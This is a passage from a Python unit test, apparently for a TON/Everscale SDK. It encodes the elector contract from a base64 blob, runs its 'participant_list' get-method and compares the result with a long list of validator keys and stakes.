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'
state_init = StateInitSource.StateInit(
code=elector_code, data=elector_data)
encode_params = ParamsOfEncodeAccount(state_init=state_init)
elector = async_core_client.abi.encode_account(params=encode_params)
run_params = ParamsOfRunGet(
account=elector.account, function_name='participant_list')
result = async_core_client.tvm.run_get(params=run_params)
self.assertEqual(
json.loads(
'[[["0x0101b6d65a384b9c70deb49fd6c43ffc0f60ed22fcc3a4966f7043794a749228","60138000000000"],[["0x03de5d8590fe6ad191bf94d4136dfb630e9b3447bb2f1a6ae2d8e3e4cbee1d9f","61000000000000"],[["0x0558f90c0682d677b46005ce2e04206c255ea9a05bfac0ff5aea9d7182a28913","60138000000000"],[["0x07698228973a595751d79e1fafd5a4145b3d35349bf0b43322afb61b138f01eb","60138000000000"],[["0x09d1ef8a40a9fbf1ca505f072258048ec15e0637baa085649d77b9a90220003e","60138000000000"],[["0x0ac21ef27c8ed4487270f1c45e99dac091ca4007951217ece344452df7047e5a","60138000000000"],[["0x0aed529418ab67a31a4b98c224f8fdb2fec11f0100c23751e67b312cba11fb23","60138000000000"],[["0x0bd14cdade9067c523f44fd208dee5daa7d852151725d713b92c840a031018a6","60138000000000"],[["0x0bddff0d98f42a3155e577a5579623a911e3b03401835166553f88375cbd9657","60138000000000"],[["0x12893bbd649bf2e1e79cb084025638cdd7906eebca40efeee7fdbd548cc96391","60138000000000"],[["0x15546bc7b5124f6d83d6c5a62b8890a48b933168e141c01229431a6c0c499780","60138000000000"],[["0x1cbea6a399ba200958db255579cda2195006f3a3108b2d6ef7e258e42c101479","60138000000000"],[["0x1f8ee6ba2902715804c769c3845b6b3a37802e462e8df63ba19f827a92dbbda0","60138000000000"],[["0x1fdd556d84d1d9f24a739c2600ec72256cc00920d85ad3a2edb3e0d72146789d","60138000000000"],[["0x20f20c2cfa4d72afb9c5f64d4735070962b3323b3629892c75f56427f175ebe4","60138000000000"],[["0x219d32737b0f3769869b8fa750ba8e3cd9f19b21a4d669c7c79d420d7f7cdb24","60138000000000"],[["0x2615b4aeb69140531228248a9d84593117b64e22d462e3968e39c1840a260523","60138000000000"],[["0x26984c9f04bc1889061e98bd9caf6955f750219d8e8dbc0986feb9d770e5a15b","60138000000000"],[["0x28bb07d80e20aa624ae47dfe53f915b23a666bf825ff283bac06c14bea1eaa74","60138000000000"],[["0x2a23566008fd4f87105b09d02c739452e45187fbada5e7e52ada356264cd6751","60138000000000"],[["0x2dcc70859876106b21b598ba9a10c9932259c36f44adeb95a178e67f6afd2f7a","60138000000000"],[["0x30b854226ef943d738d2dfcc72ede3b39d08604ca7211abf3c76f488441c77fc","60138000000000"],[["0x31bb74a5a53769d3db789d961375ea569d4
da0bd6ac2b12f830dd6be81968ef1","60138000000000"],[["0x334f22e0de2e24a070fec7c1d77d7a988a79d66b79e2d654310a963964edd337","60138000000000"],[["0x36c44eddf773390cdb42f93f8454ea9c7ca45aa8948346df8f642a59ce44c442","60138000000000"],[["0x3d29d2b5ceef46703255ce8cfe3aad3c4fefd3a2025e5a48ce78a63f20887eff","60138000000000"],[["0x41b047a20ed691e9376f7f2f60d6571290e34ef4e1b85467dcc3d7c0cf7fae90","60138000000000"],[["0x41e7541c377b58a0cfc4ca954731e971f6dc9fa6806eaa1709d011d3d32593ce","60138000000000"],[["0x426a52d3b3d016451c46b3a0eacb382fbbb38739e00d041d4038f795a54e25b5","60138000000000"],[["0x42f89915ca540af691f623f201b616caa7f5e104f8293698f8b46c4e7bb5b292","60138000000000"],[["0x4449521e793b02b036ce698c3af951e9548cd5b862b704fa5cc9e80b171a3c61","60138000000000"],[["0x492f4fee6a035a09e9ff09d65a65768899b04797cff08dc2c64ae11cd94d1968","60138000000000"],[["0x4947018f9c0c9302b2783eb5edacb76ccae3b5c5a2f6355b5b51afd1a18075f8","60138000000000"],[["0x4c27708e4ce81a0bbeb315ece024ba495f3e3fab5f83a2941b7731a58ad32160","60138000000000"],[["0x5059d40f80f578c3c384239415f54af35ab4dbdea0251618d4c3c7b4937e7e69","60138000000000"],[["0x5191f8cbfe1ce25a68c337ede75638321374112b868584092a335f83caad59a4","60138000000000"],[["0x531296c32ea64d09dcb44ff0b99843dc9855143c70b9fad42deb33881525fb84","60138000000000"],[["0x54c9860aa34ddba2a16e4f4271e1771f61f1e8a7a116fbbfa62f0e535b95559e","60138000000000"],[["0x54ce2d6b35d0d670e37fcd533ff17c2116e0acead719194e46d478944b33108e","60138000000000"],[["0x576af5e4af963a0caa957629d009906119e418e7f7778f5a55d41c0905b73a4f","60138000000000"],[["0x59905476f4781f6a79359079bfa3fe295c65d6b918afadbc352edcdb558ad094","60138000000000"],[["0x5a4e95cdf94bed240ebabded084b70b2548601686d94a751f240aedd2032e4f2","60138000000000"],[["0x5a7500f11becf6741fe5624d2298f6b830ead261871a48a81f80bf9be09ed866","180000000000000"],[["0x5c26942bf33c49485db3b2693e5d582708b44705f712c4e24af1ee84744c079e","60138000000000"],[["0x5fcdcc107e81ef4399c9d603a25fcba75cb78f1fa1bafd3acb39e3521d7fc9ce","601380000
00000"],[["0x6107f5b2974fabf6f0aa1a7898340b3f76c4ba272b95a3e4bb809c1d529b6997","60138000000000"],[["0x647b9a476f733ec5ee9cbc0bfb021335cd3166b9aaa8ad27ed0f88d9f6bf9dbe","60138000000000"],[["0x658c461d8dad54a5a9cbbbb2711920a541ba58003e7029cc228dfdfbc17ede3f","60138000000000"],[["0x661336351b889e0124fbc19f9f35f6a0f6e8c4fa9b89e9ef527718bd6aa254be","60138000000000"],[["0x6852746bbfb41e556daae99d375b2839ad62b35355c3b9fbbd54b4946ae2050f","60138000000000"],[["0x68ad3d98642913848b605dbad3f1df971f21908d360c37af4a493e9b4646b45e","60138000000000"],[["0x6c07c6be93940a83b30514b21531fd3dd204bb89e7f77b5a2421a41d4e85c74d","60138000000000"],[["0x6d4ad504054f292b7f66c7ed32f3b123bfa5c7be9c45faf26d77ad85efa64a38","60138000000000"],[["0x6e77d45d07651565be5cdb11b80c91fa18def0a434f246c0b25bb50fc4877dd4","60138000000000"],[["0x738600c570c19ef1b91bf2cd83709d71899c246bfabb5b08dc70fe32b5c81f7d","60138000000000"],[["0x7469b663b9fa7be185aa1819bfb48a4eda6e4d8af33e1955d95fa5e156d50f12","60138000000000"],[["0x77410e09363239b0999198a701e37f75775cc55049ba541497967f5d8ba74ef4","60138000000000"],[["0x781c96175cf45b791142326964347095fd0fbdd3c8579c42cea108798e025152","60138000000000"],[["0x79b43e9c18241636ae7c554097bb4bc5da03249bee67abe5366a5b093b708cab","60138000000000"],[["0x7ad807b91790868497768476e8c8e6b53ff9b1a91fbfe6a7edae8de0307a8157","60138000000000"],[["0x8308ff2b214d509d3781d7361a7ccb5f4fb976f8e386ce3c9082bcad8805d13d","60138000000000"],[["0x845a0fff44669c941475eb3f3ffd6e065ee94cfbfdcb820877744d6f9647a5d0","49899000000000"],[["0x88700f083f3bc7971c348de8357ee36b2551d8cdb7ea4b4e4e8aae558d67a231","60138000000000"],[["0x8b08c457cac18642f49ab7de0ef7551b93e11dbc2979062f22b271b890e8d2f0","60138000000000"],[["0x8bc840e0c5a98e608e70307ada41aa94a745a51f6065111942021a4e601dc3